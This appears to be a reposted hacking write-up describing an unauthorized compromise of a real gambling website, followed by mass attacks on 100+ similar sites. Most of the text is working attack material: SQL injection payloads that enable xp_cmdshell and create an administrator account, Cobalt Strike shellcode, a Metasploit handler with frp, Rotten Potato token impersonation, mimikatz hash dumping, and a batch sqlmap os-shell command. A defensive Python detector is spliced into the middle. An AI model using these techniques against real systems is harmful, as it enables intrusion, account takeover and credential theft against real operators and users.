Title: Hands-on against a gambling site - from weak password to privilege escalation

0x00 Preface

Our small team compromised a BC (gambling) site that we came across by chance. This is a record of the whole process: from a sqlmap injection that returned no echo, to getting CS (Cobalt Strike) online, to handing the session over to MSF, to escalating privileges with Rotten Potato, and finally obtaining SYSTEM.

0x01 SQL injection in the login box

There is nothing to say about the login box, so I just gave sqlmap a shot first.

Capture the login request with Burp, save it to a file and run it straight away:

python3 sqlmap.py -r '2.txt'

sqlmap reports blind and stacked-query injection.

See if sqlmap can get a shell:

python3 sqlmap.py -r '2.txt' --os-shell

Clearly unsuccessful.

The prompt says xp_cmdshell is not enabled. Since the earlier scan found stacked injection, try using the stored procedure to enable xp_cmdshell.

Payload:

userName=admin';exec sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure'xp_cmdshell', 1;RECONFIGURE;WAITFOR DELAY '0:0:15' --password=123

The 15-second delay shows the statements executed successfully (without stacked injection, each statement would have to be split out and executed one at a time; the effect should in theory be the same).

While at it, try xp_cmdshell to add a user and give it admin rights. Construct the payload (note that the password must not be too simple: Windows seems to enforce password complexity, and if the password is too simple the command may fail).

userName=admin';exec xp_cmdshell 'net user cmdshell Test ZjZ0ErUwPcxRsgG8E3hL /add';exec master.xp_cmdshell 'net localgroup administrators Test /add';WAITFOR DELAY '0:0:15' --password=123

An nmap scan shows 3389 open on the target, so connect straight away with mstsc.exe.
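A defender-side check for the technique above, added here as an example and not part of the original post: it scans captured login POST bodies for the stacked-query pattern that enables xp_cmdshell and rates each request. The signature set, severity scale and sample bodies are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the stacked-query technique in this writeup (assumptions for this example).
SIGNATURES = {
    "stacked_statement": re.compile(r"'\s*;"),                       # quote closed, new statement
    "enable_xp_cmdshell": re.compile(r"sp_configure\s*'?\s*xp_cmdshell'?\s*,\s*1", re.I),
    "xp_cmdshell_ref": re.compile(r"\bxp_cmdshell\b", re.I),
    "time_oracle": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),         # blind-injection timing oracle
    "local_user_change": re.compile(r"\bnet\s+(?:user|localgroup)\b", re.I),
}
RANK = {"benign": 0, "medium": 1, "high": 2, "critical": 3}

def decode_params(body):
    # Split on '&' only: ';' is a SQL statement separator here, not a form separator.
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params

def classify(body):
    # Returns (severity, parameter name, fired signatures) for the worst parameter.
    worst = ("benign", None, [])
    for name, value in decode_params(body).items():
        fired = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if "enable_xp_cmdshell" in fired or (
                "xp_cmdshell_ref" in fired and "stacked_statement" in fired):
            sev = "critical"   # trying to reach the OS through SQL Server
        elif "stacked_statement" in fired and "time_oracle" in fired:
            sev = "high"       # stacked time-based blind probing
        elif fired:
            sev = "medium"
        else:
            sev = "benign"
        if RANK[sev] > RANK[worst[0]]:
            worst = (sev, name, fired)
    return worst

# Constructed samples: the writeup's two payloads as a POST body would carry them, a normal login, a bare timing probe.
SAMPLE_BODIES = [
    "userName=admin';exec sp_configure 'show advanced options', 1;RECONFIGURE;"
    "EXEC sp_configure'xp_cmdshell', 1;RECONFIGURE;WAITFOR DELAY '0:0:15' --&password=123",
    "userName=admin';exec xp_cmdshell 'net user cmdshell Test ZjZ0ErUwPcxRsgG8E3hL /add';"
    "exec master.xp_cmdshell 'net localgroup administrators Test /add';WAITFOR DELAY '0:0:15' --&password=123",
    "userName=admin&password=Summer2024%21",
    "userName=admin'%3BWAITFOR+DELAY+'0%3A0%3A5'--&password=x",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(classify(body))
```

Anything rated critical is worth an immediate check of the SQL Server configuration (is xp_cmdshell now enabled?) and of local users and the administrators group on the database host.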

Could not connect.

Run os-shell again and find that commands given by absolute path can run, which is a good sign.

Shell popped successfully.

Because it is blind injection, commands such as whoami gave me no echo, so I went straight to generating a CS shellcode.

Paste the generated shellcode directly into the os-shell and press Enter.

Then the CS beacon came online, and quickly. Hurry up and call a few young people of doubtful morals to come online and play cards.

0x02 Information gathering

tasklist to check the processes: Alibaba Cloud Shield is running, which makes things a bit harder.

systeminfo to see what is there.

An Alibaba Cloud server, Windows Server 2008 R2 with 75 patches.

whoami: the database service has apparently been de-privileged; the service account has very low permissions.

Try uploading an MS16-032 exp; the upload fails outright.

At this point CS can do very little. CS was just for fun; the rest depends on MSF.

0x03 Use frp on the CS server to hand off to MSF

Open a listener in CS.

Modify the frp configuration file.

After saving the configuration file, start frp from the frp folder:

./frpc -c frpc.ini

Start msf and set up the handler:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 127.0.0.1
set LPORT 9996
run

Here you can see that MSF is now listening.

Go back to CS, right-click the host and add a session.

Choose the listener you just created and confirm.

Back in msf, the session came back, very quickly.

Drop into the shell and take a look. It has in effect taken over the CS beacon, and the permissions are still low.

0x04 Upload the Rotten Potato EXP to escalate privileges

Prepare a Rotten Potato EXP locally (note the extra backslashes in the Windows path: it works without them, but after trying a few machines I found the success rate is higher with them, and I don't know why).

upload /root/EXP/JuicyPotato/potato.exe C:\\Users\\Public

Browsing the target's files from CS shows the upload succeeded.

Then enter that folder on the target and prepare for the privilege escalation.

cd C:\\Users\\Public
use incognito
execute -cH -f ./potato.exe
list_tokens -u

Copy the administrator's token:

impersonate_token 'administrator'

Finally, check whether the escalation succeeded.

0x05 Dump password hashes with mimikatz

First escalate:

getsystem

Try to dump the hashes directly.

No luck; I have to use mimikatz.

Load mimikatz and dump the password hashes:

load mimikatz
mimikatz_command -f samdump::hashes

You can also use the module that ships with MSF (a little slower than mimikatz):

run post/windows/gather/smart_hashdump

Then throw the hash at CMD5 to crack it. If it is a weak password it will crack. This time we were lucky: it was a weak password and cracked straight away. Then connect with mstsc.exe and land on the desktop successfully.

0x06 Information gathering to widen the attack scope

After obtaining the highest privileges on the target, try to find other similar sites through information gathering and attack them in batch.

@crow extracted the site's CMS fingerprint and wrote a fofa script to scan in batch, ending up with 1900+ sites.

However, since BC sites tend to hit and run, frequently moving to new domains, most of these domain names are no longer usable, so their liveness has to be confirmed again. Using the script, this step yields 100+ live domains.

Then hit the vulnerable URL on each site in batch: feed the saved request to a multi-threaded script that runs

python3 sqlmap.py -r '{0}' --dbms='Microsoft SQL Server' --batch --os-shell

This finally yields hosts on which os-shell pops; then inject the shellcode manually, and in the end a large number of hosts come online.

0x07 A visit to the backend

Use the administrator account and password found in the database to log in to the site's backend and take a look.

20 people had deposited more than 800,000.

There is even a player whose game account is called "Bright Future", not realising that online gambling is destroying their own future!

I advise everyone to stay away from gambling, and I hope that the gamblers who are trapped in will turn back!

Reprinted from the original post: https://mp.weixin.qq.com/s?__biz=MzI3NjA4MjMyMw==mid=2647772541idx=1sn=646e732c96521e0d4d9d109426c4dc4dchksm=f35f9681c4281f97b4c46cd95f858dc90481706a6db607fcfd6596a15745ca10c88ba83e0e9fscene=21#wechat_redirect
